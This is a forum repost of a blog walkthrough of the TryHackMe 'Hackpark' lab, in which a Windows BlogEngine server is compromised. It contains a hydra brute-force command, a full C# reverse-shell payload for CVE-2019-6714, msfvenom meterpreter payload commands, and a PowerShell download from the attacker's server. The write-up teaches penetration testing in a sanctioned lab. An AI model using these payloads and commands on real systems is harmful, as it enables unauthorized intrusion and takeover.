Create an account


Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Tut] How I Solved the Hackpark Walkthrough (TryHackMe)

#1
How I Solved the Hackpark Walkthrough (TryHackMe)

<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1068923&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/hackpark-walkthrough-tryhackme/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FzSsY4-Qr5b8%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/hackpark" target="_blank" rel="noreferrer noopener">hackpark</a></li>
<li><strong>Difficulty</strong>: Medium</li>
<li><strong>Target</strong>: <code>user</code> and <code>root</code> flags on a windows machine</li>
<li><strong>Highlight</strong>: using <code>metasploit</code> to quickly and easily gain root access </li>
<li><strong>Tools</strong>: <code>nmap</code>, <code>dirb</code>, <code>hydra</code>, <code>burpsuite</code>, <code>msfvenom</code></li>
<li><strong>Tags</strong>: RCE (remote code execution), Windows</li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="718" height="893" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-189.png" alt="" class="wp-image-1068966" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-189.png 718w, https://blog.finxter.com/wp-content/uplo...41x300.png 241w" sizes="(max-width: 718px) 100vw, 718px" /></figure>
</div>
<p>In this box, we will hack into a windows machine using standard pen-testing tools. There are two options for solving the box. </p>
<p>I’ll demonstrate in this post how to hack into the box with <code>metasploit</code>. In the upcoming Hackpark Part II post, I’ll show how to find the flags without using <code>metasploit</code>.</p>
<h2>ATTACK MAP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="521" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-182-1024x521.png" alt="" class="wp-image-1068933" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-182-1024x521.png 1024w, https://blog.finxter.com/wp-content/uplo...00x153.png 300w, https://blog.finxter.com/wp-content/uplo...68x391.png 768w, https://blog.finxter.com/wp-content/uplo...ge-182.png 1189w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>IPs</p>
<p>First, let’s record our IP addresses in export format to use as bash variables.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export myIP=10.6.2.23
export targetIP=10.10.72.99</pre>
<h2>ENUMERATION</h2>
<p>We’ll kick things off with a <code>dirb</code> scan and an <code>nmap</code> scan.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">/admin is discovered on targetIP with dirb. ┌─[kalisurfer@parrot]─[~]
└──╼ $nmap 10.10.208.243
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
Nmap scan report for 10.10.208.243
Host is up (0.098s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
</pre>
<p>The <code>ms-wbt-server</code> looks interesting. A quick google search shows that this port is used for windows remote desktop. We may come back to this later on in the hack.</p>
<h2>PREPPING OUR COMMAND FOR HYDRA</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="683" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-190-1024x683.png" alt="" class="wp-image-1068968" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-190-1024x683.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-190.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Next, we’ll use firefox in developer mode to inspect the POST request when we attempt to login to the <code>/admin</code> portal with generic credentials (<code>admin:pass</code>).</p>
<pre class="wp-block-preformatted"><code>__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&amp;__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&amp;ctl00%24MainContent%24LoginUser%24UserName=user&amp;ctl00%24MainContent%24LoginUser%24Password=pass&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&amp;__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&amp;ctl00%24MainContent%24LoginUser%24UserName=user&amp;ctl00%24MainContent%24LoginUser%24Password=pass&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in</code>
</pre>
<p>Next, we’ll prepare our command for hydra to use to brute-force our way into the admin portal.</p>
<pre class="wp-block-preformatted"><code>hydra -l admin -P /home/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&amp;__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"</code></pre>
<ul>
<li><code>-l</code> is for username</li>
<li><code>-P</code> is for password wordlist </li>
<li><code>http-post-form</code> specifies the type of TCP request</li>
<li><code>:Login</code> failed (at the end of the command) specifies the message response after a failed login attempt</li>
</ul>
<p>Results:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Hydra v9.1 © 2020 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-08 18:02:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&amp;__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active
[80][http-post-form] host: 10.10.208.243 login: admin password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-08 18:03:43
</pre>
<h2>INITIAL FOOTHOLD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="503" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-191-1024x503.png" alt="" class="wp-image-1068969" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-191-1024x503.png 1024w, https://blog.finxter.com/wp-content/uplo...00x147.png 300w, https://blog.finxter.com/wp-content/uplo...68x377.png 768w, https://blog.finxter.com/wp-content/uplo...ge-191.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Now we can log in with the <code>user:password</code> combo <code>admin:1qaz2wsx</code></p>
<p>We are shown an admin dashboard. Searching up <code>blogengine</code> in <em>exploits-db.com</em> reveals a possible exploit for us to use: (<a rel="noreferrer noopener" href="https://www.exploit-db.com/exploits/46353" target="_blank">CVE-2019-6714</a>). </p>
<p>To use the exploit, we need to upload the exploit’s payload (<code>PostView.ascx</code>) through the file manager. We can then trigger it by accessing the following address in our browser: </p>
<p><em>http://10.10.172.59/?theme=../../App_Data/files</em></p>
<p>And we should then be able to catch the <a href="https://blog.finxter.com/python-one-line-reverse-shell/" data-type="post" data-id="11536" target="_blank" rel="noreferrer noopener">revshell</a> with a <code>netcat</code> listener.</p>
<h2>PREPARE THE PAYLOAD</h2>
<p>We need to change the IP and ports (in bold below) in the following payload, and then save it as <code>PostView.ascx</code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">payload:
&lt;%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
&lt;%@ Import Namespace="BlogEngine.Core" %> &lt;script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.6.2.23", 8888)) { using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } &lt;/script>
&lt;asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false">&lt;/asp:PlaceHolder>
</pre>
<h2>SET UP THE NC LISTENER</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="715" height="894" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-192.png" alt="" class="wp-image-1068971" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-192.png 715w, https://blog.finxter.com/wp-content/uplo...40x300.png 240w" sizes="(max-width: 715px) 100vw, 715px" /></figure>
</div>
<p>Next, let’s spin up a <code>netcat</code> listener with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<h2>TRIGGER THE REV SHELL</h2>
<p>Now that our malicious payload is uploaded and our <code>netcat</code> listener is activated, all we have to do is navigate to the following address, and we should catch the reverse shell as planned. </p>
<p><em>http://10.10.172.59/?theme=../../App_Data/files</em></p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="397" height="230" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-183.png" alt="" class="wp-image-1068942" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-183.png 397w, https://blog.finxter.com/wp-content/uplo...00x174.png 300w" sizes="(max-width: 397px) 100vw, 397px" /></figure>
</div>
<p>And … bingo! We’ve caught the revshell and we are in with our initial foothold!</p>
<h2>UPGRADE THE SHELL TO METERPRETER</h2>
<p>Now that we are in the shell, we can work to upgrade our shell to a meterpreter shell. This will allow us to use many powerful tools within metasploit framework. </p>
<p>We’ll use <code>python3</code> to spin up a <a href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank" rel="noreferrer noopener">simple HTTP server</a> that can help us serve the reverse meterpreter shell payload file to the windows machine. </p>
<h2>USE MSFVENOM TO CREATE REVSHELL PAYLOAD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-193-1024x684.png" alt="" class="wp-image-1068973" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-193-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-193.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>The following command will create the payload:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe</pre>
<p>The payload did not work on my machine, so I added encoding using a standard encoder, the “shikata gai nai”.&nbsp;</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe</pre>
<h2>TRANSFER THE MSFVENOM PAYLOAD TO TARGET</h2>
<p>Next, we’ll transfer the encoded payload from our attack machine to the target machine. </p>
<p>Let’s navigate to the directory that holds the <code>payload.exe</code> on our attack machine. Then we’ll spin up a simple HTTP server using the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Python3 -m http.server</pre>
<p>Then we’ll grab the file and copy it to our target Windows machine from the HTTP server:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Windows\Temp\winPEASx64.exe'"</pre>
<p>Notice that we save the file in the <code>Temp</code> directory because we have to write permissions there. This is a common configuration that can be leveraged as an unprivileged user.</p>
<h2>CATCH THE METERPRETER SHELL WITH METASPLOIT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="683" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-194-1024x683.png" alt="" class="wp-image-1068975" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-194-1024x683.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-194.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>First, let’s fire up Metasploit console:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfconsole</pre>
<p>Then load the handler:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">use exploit/multi/handler</pre>
<p>Next, we need to set the <code>lport</code>, <code>lhost</code>, and set the payload to <code>windows/meterpreter/reverse_tcp</code></p>
<p>Now that everything is set up correctly, we can run it to boot up the meterpreter listener:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Run</pre>
<p>activate the <code>shell.exe</code> on the target machine to throw a meterpreter revshell</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="943" height="547" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-184.png" alt="" class="wp-image-1068944" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-184.png 943w, https://blog.finxter.com/wp-content/uplo...00x174.png 300w, https://blog.finxter.com/wp-content/uplo...68x445.png 768w" sizes="(max-width: 943px) 100vw, 943px" /></figure>
</div>
<p>And we got it! The lower left console window shows the meterpreter shell.</p>
<p>Now that we are running a meterpreter shell in <code>msfconsole</code> we can quickly pwn the system with:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getsystem</pre>
<p>And view the system information:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sysinfo</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="533" height="359" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-185.png" alt="" class="wp-image-1068945" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-185.png 533w, https://blog.finxter.com/wp-content/uplo...00x202.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></figure>
</div>
<p>We can view our user information with the command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getuid</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="468" height="71" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-186.png" alt="" class="wp-image-1068947" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-186.png 468w, https://blog.finxter.com/wp-content/uplo...300x46.png 300w" sizes="(max-width: 468px) 100vw, 468px" /></figure>
</div>
<p>Since we are already NT Authority, thanks to the magical powers of Metasploit, we don’t need to do anything else except locate and retrieve the two flags.</p>
<p>We found both flags!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="518" height="378" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-187.png" alt="" class="wp-image-1068948" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-187.png 518w, https://blog.finxter.com/wp-content/uplo...00x219.png 300w" sizes="(max-width: 518px) 100vw, 518px" /></figure>
</div>
<p>In the next post, I’ll walk you through an alternate solution to this box without needing Metasploit.</p>
</div>


https://www.sickgaming.net/blog/2023/01/...tryhackme/
Reply



Forum Jump:


Users browsing this thread:
2 Guest(s)

Forum software by © MyBB Theme © iAndrew 2016